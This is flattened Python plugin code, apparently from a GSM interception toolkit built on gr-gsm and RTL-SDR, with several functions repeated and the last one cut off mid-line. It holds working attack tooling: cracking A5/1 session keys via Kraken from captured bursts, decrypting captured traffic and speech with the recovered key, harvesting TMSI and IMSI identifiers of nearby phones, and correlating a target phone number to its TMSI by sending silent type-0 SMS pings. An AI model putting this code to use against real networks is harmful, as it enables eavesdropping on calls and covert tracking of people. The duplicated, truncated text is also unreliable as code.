def capture_rtlsdr(self, args): path = self._config_provider.get("gr-gsm", "apps_path") capture = imp.load_source("", os.path.join(path, "grgsm_capture.py")) freq = args.freq arfcn = args.arfcn band = args.band ppm = args.ppm sample_rate = args.samp_rate gain = args.gain cfile = None burstfile = None verbose = args.print_bursts gsmtap = args.gsmtap length = args.length if freq is not None: if band: if not arfcn.is_valid_downlink(freq, band): self.printmsg("Frequency is not valid in the specified band") return else: arfcn = arfcn.downlink2arfcn(freq, band) else: for band in arfcn.get_bands(): if arfcn.is_valid_downlink(freq, band): arfcn = arfcn.downlink2arfcn(freq, band) break elif arfcn is not None: if band: if not arfcn.is_valid_arfcn(arfcn, band): self.printmsg("ARFCN is not valid in the specified band") return else: freq = arfcn.arfcn2downlink(arfcn, band) else: for band in arfcn.get_bands(): if arfcn.is_valid_arfcn(arfcn, band): freq = arfcn.arfcn2downlink(arfcn, band) break if ppm is None: ppm = self._config_provider.getint("rtl_sdr", "ppm") if sample_rate is None: sample_rate = self._config_provider.getint("rtl_sdr", "sample_rate") if gain is None: gain = self._config_provider.getint("rtl_sdr", "gain") if args.cfile is not None: cfile = self._data_access_provider.getfilepath(args.cfile) if args.bursts is not None: burstfile = self._data_access_provider.getfilepath(args.bursts) if cfile is None and burstfile is None: self.printmsg("You must provide either a cfile or a burst file as destination.") return tb = grgsm_capture(fc=freq, gain=gain, samp_rate=sample_rate, ppm=ppm, arfcn=arfcn, cfile=cfile, burst_file=burstfile, band=band, verbose=verbose, gsmtap=gsmtap, rec_length=length) def signal_handler(signal, frame): tb.stop() tb.wait() signal.signal(signal.SIGINT, signal_handler) tb.start() tb.wait()
class A51ReconstructionPlugin(PluginBase): attack_modes = ['SDCCH', 'SACCH', 'SDCCH/SACCH'] channel_modes = ['BCCH', 'BCCH_SDCCH4', 'SDCCH8'] @arg( "-m", action="store", dest="mode", choices=channel_modes, help= "Channel mode. This determines on which channels to search for messages that can be cracked.", default="BCCH_SDCCH4") @arg( "--attack-mode", action="store", dest="attackmode", choices=attack_modes, help= "Attack mode. This determines on which channels to search for messages that can be cracked.", default="SDCCH/SACCH") @arg("-t", action="store", dest="timeslot", type=int, help="Timeslot of the Immediate Assignment or Cipher Mode Command.", default=0) @arg("-v", action="store_true", dest="verbose", help="If enabled the command displays verbose information.") @arg_exclusive(args=[ arg("--cfile", action="store_path", dest="cfile", help="cfile."), arg("--bursts", action="store_path", dest="bursts", help="bursts.") ]) @arg_group( name="Cfile Options", args=[ arg("-a", action="store", dest="arfcn", type=int, help="ARFCN of the cfile capture."), arg("-f", action="store", dest="freq", type=float, help="Frequency of the cfile capture."), arg("-b", action="store", dest="band", choices=arfcn.get_bands(), help="GSM of the cfile capture."), arg("-p", action="store", dest="ppm", type=int, help="Set ppm. Default: value from config file."), arg("-s", action="store", dest="samp_rate", type=float, help="Set sample rate. Default: value from config file."), arg("-g", action="store", type=float, dest="gain", help="Set gain. Default: value from config file.") ]) @arg_exclusive(args=[ arg("--frame-ia", action="store", dest="fnr_ia", type=int, help="Framenumber of the Immediate Assignment."), arg("--frame-cmc", action="store", dest="fnr_cmc", type=int, help="Framenumber of the Cipher Mode Command.") ]) @cmd( name="a51_kraken", description= "Reconstruct A51 session key from captured messages using Kraken TMTO." ) def a51_kraken(self, args): fnr_cmc = args.fnr_cmc timeslot = args.timeslot subchannel = None is_cmc_provided = False burst_file = args.bursts mode = args.mode if args.fnr_cmc is not None: is_cmc_provided = True elif args.fnr_ia is not None: ia_extractor = ImmediateAssignmentExtractor( burst_file, timeslot, mode, args.fnr_ia) ia_extractor.start() ia_extractor.wait() error = True mode = "BCCH_SDCCH4" immediate_assignments = ia_extractor.extract_immediate_assignment.get_frame_numbers( ) for i in range(len(immediate_assignments)): if immediate_assignments[i] == args.fnr_ia: self.printmsg("Immediate Assignment at %s" % immediate_assignments[i]) timeslot = ia_extractor.extract_immediate_assignment.get_timeslots( )[i] subchannel = ia_extractor.extract_immediate_assignment.get_subchannels( )[i] if ia_extractor.extract_immediate_assignment.get_channel_types( )[i] == "SDCCH/8": mode = "SDCCH8" error = False break if error: self.printmsg( "No valid framenumber for immediate assignment was provided." ) return cmc_finder = CMCFinder(burst_file, timeslot, subchannel, mode, args.fnr_ia) # ToDo: channeltype from ia cmc_finder.start() cmc_finder.wait() fnr_cmc = cmc_finder.get_cmc() if fnr_cmc is None: self.printmsg("No cipher mode command was found.") return else: self.printmsg( "No valid framenumber for cipher mode command or immediate assignment was provided." ) return fnr_start = fnr_cmc - 2 * 102 # should be (args.fnr_cmc - 3 * 102 + max_fnr) mod max_fnr fnr_end = fnr_cmc + 3 * 102 + 3 # should be (args.fnr_cmc + 3 * 102 + 3) mod max_fnr cmc_analyzer = CMCAnalyzer(timeslot, burst_file, mode, fnr_start, fnr_end) cmc_analyzer.start() cmc_analyzer.wait() if not cmc_analyzer.is_a51_cmc(fnr_cmc): self.printmsg("Cipher Mode Command at %s does not assign A5/1" % fnr_cmc) return else: self.printmsg("Cipher Mode Command at %s" % fnr_cmc) if is_cmc_provided: subchannel = cmc_analyzer.get_subchannel(fnr_cmc) kraken_burst_sets = cmc_analyzer.createLapdmUiBurstSets(fnr_cmc) kraken_adapter = KrakenA51ReconstructorAdapter(self._config_provider) key_found = False if args.attackmode != "SACCH": sdcch_counter = 0 for burst_set in kraken_burst_sets: if sdcch_counter % 4 == 0 and args.verbose: self.printmsg( "Using SDCCH message bursts %s - %s" % (burst_set.frame_number, burst_set.frame_number + 4)) sdcch_counter += 1 key = kraken_adapter.send2kraken(burst_set, args.verbose) if key is not None: key_found = True self.printmsg("Key found: %s" % key) break else: # self.printmsg("%s - no key found" % burst_set.frame_number) pass if key_found or args.attackmode == "SDCCH": return # self.printmsg("Starting attack on SACCH") last_sit_fnr = -1 last_si_type = None timingadvance = -1 plaintext_si_msgs = dict() for sit_fnr in cmc_analyzer.sacch_sits: if sit_fnr > last_sit_fnr and sit_fnr < fnr_cmc: last_sit_fnr = sit_fnr # extract timing advance last_si_type = cmc_analyzer.sacch_sits[sit_fnr][1] data_string = cmc_analyzer.sacch_sits[sit_fnr][2] # byte_arr = array.array('B', data_string.decode("hex")) byte_list = self.byte_string_to_list(data_string) timingadvance = byte_list[1] # add the system information messages from the attacked sacch # those should have the right timing advance anyway (at least in most cases) if not plaintext_si_msgs.has_key(last_si_type): plaintext_si_msgs[last_si_type] = byte_list if last_sit_fnr == -1: self.printmsg( "Could not determine last System Information message") return # self.printmsg("Last SI message at " + str(last_sit_fnr)) si_collector = SICollector(timeslot, burst_file, mode) si_collector.start() si_collector.wait() # collect all system information message types used on SACCH by the network for t in si_collector.si_messages: # there can be at most four different system information message types on SACCH. if len(plaintext_si_msgs) >= 4: break # if the type is not in the plaintext dictionary or has another timing advance # we put it in the dict if not plaintext_si_msgs.has_key( t) or plaintext_si_msgs[t][1] != timingadvance: plaintext_si_msgs[t] = self.byte_string_to_list( si_collector.si_messages[t]) for msg in plaintext_si_msgs: # correct timing advance if plaintext_si_msgs[msg][1] != timingadvance: plaintext_si_msgs[msg][1] = timingadvance # create bursts for all system information message types plaintext_si_bursts = dict() for msg in plaintext_si_msgs: plaintext_si_bursts[msg] = self.message_to_bursts( plaintext_si_msgs[msg]) sacch_si_types = [ "System Information Type 5", "System Information Type 5bis", "System Information Type 5ter", "System Information Type 6" ] if not plaintext_si_msgs.has_key("System Information Type 5bis"): sacch_si_types.remove("System Information Type 5bis") if not plaintext_si_msgs.has_key("System Information Type 5ter"): sacch_si_types.remove("System Information Type 5ter") type_pool = cycle(sacch_si_types) dropwhile(lambda x: x != last_si_type, type_pool) next(type_pool ) # next one would last_si_type, which we use as starting point # assemble burst sets sacch_burst_sets = [] for i in range(1, 4): type_of_msg = next(type_pool) # expected type of next message fnr_of_msg = last_sit_fnr + i * 102 bursts_of_plaintext = plaintext_si_bursts[type_of_msg] for j in range(0, 4): fnr = fnr_of_msg + j check_burst_index = 0 if j > 0 else 1 sacch_burst_sets.append( A5BurstSet( fnr, # framenumber of the burst we want to use cmc_analyzer.bursts[ fnr], # data (payload) of the burst we want to use bursts_of_plaintext[ j], # plaintext data (payload) of a lapdm ui message fnr_of_msg + check_burst_index, # framenumber of verification burst. # we use the first burst of the message as check burst, if j > 0 cmc_analyzer.bursts[ fnr_of_msg + check_burst_index ], # data (payload) of the verification burst bursts_of_plaintext[ check_burst_index] # plaintextdata (payload) of # the verification burst )) sacch_counter = 0 for burst_set in sacch_burst_sets: if sacch_counter % 4 == 0 and args.verbose: self.printmsg( "Using SACCH message bursts %s - %s" % (burst_set.frame_number, burst_set.frame_number + 4)) sacch_counter += 1 key = kraken_adapter.send2kraken(burst_set, args.verbose) if key is not None: key_found = True self.printmsg("Key found: %s" % key) break else: pass # self.printmsg("%s - no key found" % burst_set.frame_number) # self.printmsg("I am done....") # Todo: look at a lapdm ui message: if randomized, we wont do the attempt on sdcch def byte_string_to_list(self, string): byte_arr = array.array('B', string.decode("hex")) return byte_arr.tolist() def message_to_bursts(self, message_bytes): result = [] message = "" for byte in message_bytes: message += "%0.2X" % byte output = check_output(["gsmframecoder", message]).split("\n") if len(output) >= 9: for i in range(4): result.append(output[(i + 1) * 2]) return result
class ScanPlugin(PluginBase): @arg("--speed", action="store", dest="speed", type=int, help="Scan speed. Value range 0-5.", default=4) @arg_group( name="RTL-SDR configuration", args=[ arg("-p", action="store", dest="ppm", type=int, help="Set ppm. Default: value from config file."), arg("-s", action="store", dest="samp_rate", type=float, help="Set sample rate. Default: value from config file."), arg("-g", action="store", type=float, dest="gain", help="Set gain. Default: value from config file.") ]) @arg("-b", action="store", dest="band", choices=(arfcn.get_bands()), help="GSM band of the ARFCN.") @arg( "-v", action="store_true", dest="verbose", help= "Verbose output, including CCCH configuration, cell ARFCN\'s and neighbour ARFCN\'s" ) @cmd(name="scan_rtlsdr", description="Scan a GSM band using a RTL-SDR device.") def scan_rtlsdr(self, args): if args.speed < 0 or args.speed > 5: raise PluginError("Invalid speed") path = self._config_provider.get("gr-gsm", "apps_path") grgsm_scanner = imp.load_source("", os.path.join(path, "grgsm_scanner")) band = args.band sample_rate = args.samp_rate ppm = args.ppm gain = args.gain speed = args.speed if ppm is None: ppm = self._config_provider.getint("rtl_sdr", "ppm") if sample_rate is None: sample_rate = self._config_provider.getint("rtl_sdr", "sample_rate") if gain is None: gain = self._config_provider.getint("rtl_sdr", "gain") if band == 'DCS1800' or band == 'PCS1900': shmmni = self.get_shmmni() if shmmni < 32000: msg = "Unsufficient shared memory segments.\n" msg += "For scanning DCS1800 or PCS1900 you need to increase the value, i.e. using the following command:\n\n" msg += "sudo sysctl kernel.shmmni=32000" self.printmsg(msg) return channels_num = int(sample_rate / 0.2e6) for arfcn_range in arfcn.get_arfcn_ranges(args.band): try: first_arfcn = arfcn_range[0] last_arfcn = arfcn_range[1] last_center_arfcn = last_arfcn - int((channels_num / 2) - 1) current_freq = arfcn.arfcn2downlink( first_arfcn + int(channels_num / 2) - 1, band) last_freq = arfcn.arfcn2downlink(last_center_arfcn, band) stop_freq = last_freq + 0.2e6 * channels_num while current_freq < stop_freq: # silence rtl_sdr output: with Silencer(): # instantiate scanner and processor scanner = grgsm_scanner.wideband_scanner( rec_len=6 - speed, sample_rate=sample_rate, carrier_frequency=current_freq, ppm=ppm, args="") # start recording scanner.start() scanner.wait() scanner.stop() freq_offsets = numpy.fft.ifftshift( numpy.array( range(int(-numpy.floor(channels_num / 2)), int(numpy.floor( (channels_num + 1) / 2)))) * 2e5) detected_c0_channels = scanner.gsm_extract_system_info.get_chans( ) found_list = [] if detected_c0_channels: chans = numpy.array( scanner.gsm_extract_system_info.get_chans()) found_freqs = current_freq + freq_offsets[(chans)] cell_ids = numpy.array( scanner.gsm_extract_system_info.get_cell_id()) lacs = numpy.array( scanner.gsm_extract_system_info.get_lac()) mccs = numpy.array( scanner.gsm_extract_system_info.get_mcc()) mncs = numpy.array( scanner.gsm_extract_system_info.get_mnc()) ccch_confs = numpy.array( scanner.gsm_extract_system_info.get_ccch_conf( )) powers = numpy.array( scanner.gsm_extract_system_info.get_pwrs()) for i in range(0, len(chans)): cell_arfcn_list = scanner.gsm_extract_system_info.get_cell_arfcns( chans[i]) neighbour_list = scanner.gsm_extract_system_info.get_neighbours( chans[i]) info = grgsm_scanner.channel_info( arfcn.downlink2arfcn(found_freqs[i], band), found_freqs[i], cell_ids[i], lacs[i], mccs[i], mncs[i], ccch_confs[i], powers[i], neighbour_list, cell_arfcn_list) found_list.append(info) scanner = None for info in sorted(found_list): self.printmsg(info.__str__()) if args.verbose: self.printmsg(info.get_verbose_info()) current_freq += channels_num * 0.2e6 except KeyboardInterrupt: self.printmsg("Stopping.") def get_shmmni(self): result = subprocess.check_output(["sysctl kernel.shmmni"], shell=True, stderr=subprocess.STDOUT) if result.startswith("kernel.shmmni"): return int(result.strip("kernel.shmmni = ")) else: return None
class CapturePlugin(PluginBase): @arg_group(name="Capturing", args=[ arg("--gsmtap", action="store_true", dest="gsmtap", help="Output to GSMTap.", default=False), arg("--print-bursts", action="store_true", dest="print_bursts", help="Print captured bursts.", default=False), arg("--length", action="store", dest="length", type=int, help="Length of the record in seconds."), arg("--cfile", action="store_path", dest="cfile", help="cfile."), arg("--bursts", action="store_path", dest="bursts", help="bursts."), ]) @arg_group(name="RTL-SDR configuration", args=[ arg("-p", action="store", dest="ppm", type=int, help="Set ppm. Default: value from config file."), arg("-s", action="store", dest="samp_rate", type=float, help="Set sample rate. Default: value from config file."), arg("-g", action="store", type=float, dest="gain", help="Set gain. Default: value from config file.") ]) @arg_exclusive(args=[ arg("-a", action="store", dest="arfcn", type=int, help="ARFCN of the BTS."), arg("-f", action="store", dest="freq", type=float, help="Frequency of the BTS.") ]) @arg("-b", action="store", dest="band", choices=(arfcn.get_bands()), help="GSM band of the ARFCN.") @cmd(name="capture_rtlsdr", description="Capture and save GSM transmissions using a RTL-SDR device.") def capture_rtlsdr(self, args): path = self._config_provider.get("gr-gsm", "apps_path") capture = imp.load_source("", os.path.join(path, "grgsm_capture.py")) freq = args.freq arfcn = args.arfcn band = args.band ppm = args.ppm sample_rate = args.samp_rate gain = args.gain cfile = None burstfile = None verbose = args.print_bursts gsmtap = args.gsmtap length = args.length if freq is not None: if band: if not arfcn.is_valid_downlink(freq, band): self.printmsg("Frequency is not valid in the specified band") return else: arfcn = arfcn.downlink2arfcn(freq, band) else: for band in arfcn.get_bands(): if arfcn.is_valid_downlink(freq, band): arfcn = arfcn.downlink2arfcn(freq, band) break elif arfcn is not None: if band: if not arfcn.is_valid_arfcn(arfcn, band): self.printmsg("ARFCN is not valid in the specified band") return else: freq = arfcn.arfcn2downlink(arfcn, band) else: for band in arfcn.get_bands(): if arfcn.is_valid_arfcn(arfcn, band): freq = arfcn.arfcn2downlink(arfcn, band) break if ppm is None: ppm = self._config_provider.getint("rtl_sdr", "ppm") if sample_rate is None: sample_rate = self._config_provider.getint("rtl_sdr", "sample_rate") if gain is None: gain = self._config_provider.getint("rtl_sdr", "gain") if args.cfile is not None: cfile = self._data_access_provider.getfilepath(args.cfile) if args.bursts is not None: burstfile = self._data_access_provider.getfilepath(args.bursts) if cfile is None and burstfile is None: self.printmsg("You must provide either a cfile or a burst file as destination.") return tb = grgsm_capture(fc=freq, gain=gain, samp_rate=sample_rate, ppm=ppm, arfcn=arfcn, cfile=cfile, burst_file=burstfile, band=band, verbose=verbose, gsmtap=gsmtap, rec_length=length) def signal_handler(signal, frame): tb.stop() tb.wait() signal.signal(signal.SIGINT, signal_handler) tb.start() tb.wait()
def decode(self, args): path = self._config_provider.get("gr-gsm", "apps_path") decoder = imp.load_source("", os.path.join(path, "grgsm_decode")) timeslot = args.timeslot subslot = args.subslot mode = args.mode burstfile = None cfile = None freq = args.freq arfcn = args.arfcn band = args.band ppm = args.ppm sample_rate = args.samp_rate gain = args.gain verbose = args.print_messages kc = [] def kc_parse(kc, value): """ Callback function that parses Kc """ # format 0x12,0x34,0x56,0x78,0x90,0xAB,0xCD,0xEF if ',' in value: value_str = value.split(',') for s in value_str: val = int(s, 16) if val < 0 or val > 255: pass # error kc.append(val) if len(kc) != 8: kc = [] # error elif len(value) == 16: for i in range(8): s = value[2 * i:2 * i + 2] val = int(s, 16) if val < 0 or val > 255: pass # error # parser.error("Invalid Kc % s\n" % s) kc.append(val) else: pass # error if args.kc is not None: kc_parse(kc, args.kc) if freq is not None: if band: if not arfcn.is_valid_downlink(freq, band): self.printmsg( "Frequency is not valid in the specified band") return else: arfcn = arfcn.downlink2arfcn(freq, band) else: for band in arfcn.get_bands(): if arfcn.is_valid_downlink(freq, band): arfcn = arfcn.downlink2arfcn(freq, band) break elif arfcn is not None: if band: if not arfcn.is_valid_arfcn(arfcn, band): self.printmsg("ARFCN is not valid in the specified band") return else: freq = arfcn.arfcn2downlink(arfcn, band) else: for band in arfcn.get_bands(): if arfcn.is_valid_arfcn(arfcn, band): freq = arfcn.arfcn2downlink(arfcn, band) break if ppm is None: ppm = self._config_provider.getint("rtl_sdr", "ppm") if sample_rate is None: sample_rate = self._config_provider.getint("rtl_sdr", "sample_rate") if gain is None: gain = self._config_provider.getint("rtl_sdr", "gain") if args.cfile is not None: cfile = self._data_access_provider.getfilepath(args.cfile) if args.bursts is not None: burstfile = self._data_access_provider.getfilepath(args.bursts) if cfile is None and burstfile is None: self.printmsg( "You must provide either a cfile or a burst file as destination." ) return tb = decoder.grgsm_decoder(timeslot=timeslot, subslot=subslot, chan_mode=mode, burst_file=burstfile, cfile=cfile, fc=freq, samp_rate=sample_rate, a5=args.a5, a5_kc=kc, speech_file=args.speech_output_file, speech_codec=self.tch_codecs.get( args.speech_codec), enable_voice_boundary_detection=False, verbose=verbose, print_bursts=args.print_bursts, ppm=ppm) tb.start() tb.wait()
class DecoderPlugin(PluginBase): channel_modes = ['BCCH', 'BCCH_SDCCH4', 'SDCCH8', 'TCHF'] tch_codecs = collections.OrderedDict([('FR', grgsm.TCH_FS), ('EFR', grgsm.TCH_EFR), ('AMR12.2', grgsm.TCH_AFS12_2), ('AMR10.2', grgsm.TCH_AFS10_2), ('AMR7.95', grgsm.TCH_AFS7_95), ('AMR7.4', grgsm.TCH_AFS7_4), ('AMR6.7', grgsm.TCH_AFS6_7), ('AMR5.9', grgsm.TCH_AFS5_9), ('AMR5.15', grgsm.TCH_AFS5_15), ('AMR4.75', grgsm.TCH_AFS4_75)]) @arg("-m", action="store", dest="mode", choices=channel_modes, help="Channel mode.", default="BCCH") @arg("-t", action="store", dest="timeslot", type=int, help="Timeslot to decode.", default=0) @arg( "--subslot", action="store", dest="subslot", type=int, help= "Subslot to decode. Use in combination with channel type BCCH_SDCCH4 and SDCCH8." ) @arg_exclusive(args=[ arg("--cfile", action="store_path", dest="cfile", help="cfile."), arg("--bursts", action="store_path", dest="bursts", help="bursts.") ]) @arg("--print-messages", action="store_true", dest="print_messages", help="Print decoded messages.", default=False) @arg("--print-bursts", action="store_true", dest="print_bursts", help="Print decoded messages.", default=False) @arg_group( name="Cfile Options", args=[ arg("-a", action="store", dest="arfcn", type=int, help="ARFCN of the cfile capture."), arg("-f", action="store", dest="freq", type=float, help="Frequency of the cfile capture."), arg("-b", action="store", dest="band", choices=arfcn.get_bands(), help="GSM of the cfile capture."), arg("-p", action="store", dest="ppm", type=int, help="Set ppm. Default: value from config file."), arg("-s", action="store", dest="samp_rate", type=float, help="Set sample rate. Default: value from config file."), arg("-g", action="store", type=float, dest="gain", help="Set gain. Default: value from config file.") ]) @arg_group(name="Decryption Options", args=[ arg("-5", "--a5", action="store", dest="a5", type=int, help="A5 version.", default=1), arg("-k", "--kc", action="store", dest="kc", help="A5 session key Kc. Valid formats are " "'0x12,0x34,0x56,0x78,0x90,0xAB,0xCD,0xEF' " "and '1234567890ABCDEF'"), ]) @arg_group( name="TCH Options", args=[ arg("-c", action="store", dest="speech_codec", choices=tch_codecs.keys(), help="TCH-F speech codec."), arg("-o", action="store", dest="speech_output_file", help="TCH/F speech output file"), arg("--voice-boundary-detect", action="store_true", dest="enable_voice_boundary_detection", help= "Enable voice boundary detection for traffic channels. This can help reduce noice in the output.", default=False), ]) @cmd(name="decode", description="Decodes GSM messages.") def decode(self, args): path = self._config_provider.get("gr-gsm", "apps_path") decoder = imp.load_source("", os.path.join(path, "grgsm_decode")) timeslot = args.timeslot subslot = args.subslot mode = args.mode burstfile = None cfile = None freq = args.freq arfcn = args.arfcn band = args.band ppm = args.ppm sample_rate = args.samp_rate gain = args.gain verbose = args.print_messages kc = [] def kc_parse(kc, value): """ Callback function that parses Kc """ # format 0x12,0x34,0x56,0x78,0x90,0xAB,0xCD,0xEF if ',' in value: value_str = value.split(',') for s in value_str: val = int(s, 16) if val < 0 or val > 255: pass # error kc.append(val) if len(kc) != 8: kc = [] # error elif len(value) == 16: for i in range(8): s = value[2 * i:2 * i + 2] val = int(s, 16) if val < 0 or val > 255: pass # error # parser.error("Invalid Kc % s\n" % s) kc.append(val) else: pass # error if args.kc is not None: kc_parse(kc, args.kc) if freq is not None: if band: if not arfcn.is_valid_downlink(freq, band): self.printmsg( "Frequency is not valid in the specified band") return else: arfcn = arfcn.downlink2arfcn(freq, band) else: for band in arfcn.get_bands(): if arfcn.is_valid_downlink(freq, band): arfcn = arfcn.downlink2arfcn(freq, band) break elif arfcn is not None: if band: if not arfcn.is_valid_arfcn(arfcn, band): self.printmsg("ARFCN is not valid in the specified band") return else: freq = arfcn.arfcn2downlink(arfcn, band) else: for band in arfcn.get_bands(): if arfcn.is_valid_arfcn(arfcn, band): freq = arfcn.arfcn2downlink(arfcn, band) break if ppm is None: ppm = self._config_provider.getint("rtl_sdr", "ppm") if sample_rate is None: sample_rate = self._config_provider.getint("rtl_sdr", "sample_rate") if gain is None: gain = self._config_provider.getint("rtl_sdr", "gain") if args.cfile is not None: cfile = self._data_access_provider.getfilepath(args.cfile) if args.bursts is not None: burstfile = self._data_access_provider.getfilepath(args.bursts) if cfile is None and burstfile is None: self.printmsg( "You must provide either a cfile or a burst file as destination." ) return tb = decoder.grgsm_decoder(timeslot=timeslot, subslot=subslot, chan_mode=mode, burst_file=burstfile, cfile=cfile, fc=freq, samp_rate=sample_rate, a5=args.a5, a5_kc=kc, speech_file=args.speech_output_file, speech_codec=self.tch_codecs.get( args.speech_codec), enable_voice_boundary_detection=False, verbose=verbose, print_bursts=args.print_bursts, ppm=ppm) tb.start() tb.wait()
class TmsiPlugin(PluginBase): channel_modes = ['BCCH', 'BCCH_SDCCH4'] @arg("-v", action="store_true", dest="verbose", help="If set, the captured TMSI / IMSI are printed.") @arg( "-o", action="store", dest="dest_file", help="If set, the captured TMSI / IMSI are stored in the specified file." ) @arg("-m", action="store", dest="mode", choices=channel_modes, help="Channel mode.", default="BCCH") @arg_group( name="Cfile Options", args=[ arg("-a", action="store", dest="arfcn", type=int, help="ARFCN of the cfile capture."), arg("-f", action="store", dest="freq", type=float, help="Frequency of the cfile capture."), arg("-b", action="store", dest="band", choices=arfcn.get_bands(), help="GSM of the cfile capture."), arg("-p", action="store", dest="ppm", type=int, help="Set ppm. Default: value from config file."), arg("-s", action="store", dest="samp_rate", type=float, help="Set sample rate. Default: value from config file."), arg("-g", action="store", type=float, dest="gain", help="Set gain. Default: value from config file.") ]) @arg("-t", action="store", dest="timeslot", type=int, help="Timeslot of the CCCH.", default=0) @arg_exclusive(args=[ arg("--cfile", action="store_path", dest="cfile", help="cfile."), arg("--bursts", action="store_path", dest="bursts", help="bursts.") ]) @cmd(name="tmsi_capture", description="TMSI capturing.") def tmsi_capture(self, args): verbose = args.verbose destfile = None mode = args.mode freq = args.freq arfcn = args.arfcn band = args.band ppm = args.ppm sample_rate = args.samp_rate gain = args.gain timeslot = args.timeslot cfile = None burstfile = None if args.cfile is None and args.bursts is None: raise PluginError("Provide a cfile or burst file.") if args.dest_file is not None: destfile = self._data_access_provider.getfilepath(args.dest_file) if args.cfile is not None: cfile = self._data_access_provider.getfilepath(args.cfile) if args.bursts is not None: burstfile = self._data_access_provider.getfilepath(args.bursts) flowgraph = TmsiCapture(timeslot=timeslot, chan_mode=mode, burst_file=burstfile, cfile=cfile, fc=freq, samp_rate=sample_rate, ppm=ppm) flowgraph.start() flowgraph.wait() tmsis = dict() imsis = dict() with open("tmsicount.txt") as file: content = file.readlines() for line in content: segments = line.strip().split("-") if segments[0] != "0": key = segments[0] if tmsis.has_key(key): tmsis[key] += 1 else: tmsis[key] = 1 else: key = segments[2] if imsis.has_key(key): imsis[key] += 1 else: imsis[key] = 1 self.printmsg("Captured {} TMSI, {} IMSI\n".format( len(tmsis), len(imsis))) if verbose or destfile is not None: sorted_tmsis = sorted(tmsis, key=tmsis.__getitem__, reverse=True) sorted_imsis = sorted(imsis, key=imsis.__getitem__, reverse=True) if destfile is not None: with open(destfile, "w") as file: for key in sorted_tmsis: file.write("{}:{}\n".format(key, tmsis[key])) for key in sorted_imsis: file.write("{}:{}\n".format(key, imsis[key])) if verbose: for key in sorted_tmsis: self.printmsg("{} ({} times)".format(key, tmsis[key])) for key in sorted_imsis: self.printmsg("{} ({} times)".format(key, imsis[key])) os.remove("tmsicount.txt")
def tmsi_correlation(self, args): mode = args.mode freq = args.freq arfcn = args.arfcn band = args.band ppm = args.ppm sample_rate = args.samp_rate gain = args.gain timeslot = args.timeslot max_iterations = args.max_sms msisdn = args.msisdn wait = args.wait if ppm is None: ppm = self._config_provider.getint("rtl_sdr", "ppm") if sample_rate is None: sample_rate = self._config_provider.getint("rtl_sdr", "sample_rate") if gain is None: gain = self._config_provider.getint("rtl_sdr", "gain") if freq is not None: if band: if not arfcn.is_valid_downlink(freq, band): self.printmsg("Frequency is not valid in the specified band") return else: arfcn = arfcn.downlink2arfcn(freq, band) else: for band in arfcn.get_bands(): if arfcn.is_valid_downlink(freq, band): arfcn = arfcn.downlink2arfcn(freq, band) break elif arfcn is not None: if band: if not arfcn.is_valid_arfcn(arfcn, band): self.printmsg("ARFCN is not valid in the specified band") return else: freq = arfcn.arfcn2downlink(arfcn, band) else: for band in arfcn.get_bands(): if arfcn.is_valid_arfcn(arfcn, band): freq = arfcn.arfcn2downlink(arfcn, band) break # todo: stop if max_iterations < 6 response_queue = Queue.Queue() def callback(msg): response_queue.put(msg) adapter = GatAppSmsAdapter(self._config_provider, wait) adapter.register_read_callback(callback) candidates = set() i = 0 try: while i < max_iterations: flowgraph = TmsiLiveCapture(timeslot=timeslot, chan_mode=mode, fc=freq, arfcn=arfcn, samp_rate=sample_rate, ppm=ppm, gain=gain) with Silencer(): flowgraph.start() response_received = False adapter.send(sms_type=SmsType.MWID_Report, msisdn=msisdn, text=None) start = time.time() now = start while (now - start) < 15: if not response_queue.empty(): response = response_queue.get() # self.printmsg("response: " + response) if "Connection refused" in response.strip('\n'): self.printmsg("Failed to connect to GAT app") break response_msg = self.parse_response(response) response_type = response_msg[0] response_msisdn = response_msg[1] response_status = response_msg[2] if response_type == "sms-status": if response_status != "OK": self.printmsg("Sending to %s failed" % response_msisdn) else: pass # self.printmsg("SMS message to %s was sent." % response_msisdn) elif response_type == "sms-rcv": # recipient got our message response_received = True break if response_type == "sms-send" and response_status != "OK": self.printmsg("Sending to %s failed" % response_msisdn) elif response_type == "sms-delivery": if response_status != "OK": self.printmsg("Delivery to %s failed." % response_msisdn) else: self.printmsg("Response from %s received." % response_msisdn) time.sleep(0.2) # ToDo: No busy waiting ! now = time.time() if not response_received: self.printmsg("Timeout: no response to the ping") # return flowgraph.wait() flowgraph.stop() flowgraph = None iteration_candidates = self.read_tmsi_file() if i == 0: candidates = candidates.union(iteration_candidates) else: candidates = candidates.intersection(iteration_candidates) print "candidates: " + str(len(candidates)) if len(candidates) == 0: if i > 0: self.printmsg("No intersection found.") break else: self.printmsg("No TMSIs captured.") break elif len(candidates) == 1: result = candidates.pop() self.printmsg("Found TMSI: {}".format(result)) break i += 1 except Exception, e: print e
class TmsiIdentificationPlugin(PluginBase): channel_modes = ['BCCH', 'BCCH_SDCCH4'] # anzahl der iterationen @arg("-n", action="store", dest="max_sms", type=int, help="Max number of type 0 SMS messages to send.", default=6) @arg('-w', '--wait-for-response', action="store", dest="wait", type=int, default=15, help="Wait n seconds for a response to a SMS ping.") @arg("-m", action="store", dest="mode", choices=channel_modes, help="Channel mode.", default="BCCH") @arg_group(name="RTL-SDR configuration", args=[ arg("-p", action="store", dest="ppm", type=int, help="Set ppm. Default: value from config file."), arg("-s", action="store", dest="samp_rate", type=float, help="Set sample rate. Default: value from config file."), arg("-g", action="store", type=float, dest="gain", help="Set gain. Default: value from config file.") ]) @arg_exclusive(args=[ arg("-a", action="store", dest="arfcn", type=int, help="ARFCN of the BTS."), arg("-f", action="store", dest="freq", type=float, help="Frequency of the BTS.") ]) @arg("-b", action="store", dest="band", choices=(arfcn.get_bands()), help="GSM band of the ARFCN.") @arg("-t", action="store", dest="timeslot", type=int, help="Timeslot of the CCCH.", default=0) @arg('msisdn', action="store", help="MSISDN to correlate (i.e. +43123456789).") @cmd(name="tmsi_correlation", description="Perform TMSI-MSISDN correlation.") def tmsi_correlation(self, args): mode = args.mode freq = args.freq arfcn = args.arfcn band = args.band ppm = args.ppm sample_rate = args.samp_rate gain = args.gain timeslot = args.timeslot max_iterations = args.max_sms msisdn = args.msisdn wait = args.wait if ppm is None: ppm = self._config_provider.getint("rtl_sdr", "ppm") if sample_rate is None: sample_rate = self._config_provider.getint("rtl_sdr", "sample_rate") if gain is None: gain = self._config_provider.getint("rtl_sdr", "gain") if freq is not None: if band: if not arfcn.is_valid_downlink(freq, band): self.printmsg("Frequency is not valid in the specified band") return else: arfcn = arfcn.downlink2arfcn(freq, band) else: for band in arfcn.get_bands(): if arfcn.is_valid_downlink(freq, band): arfcn = 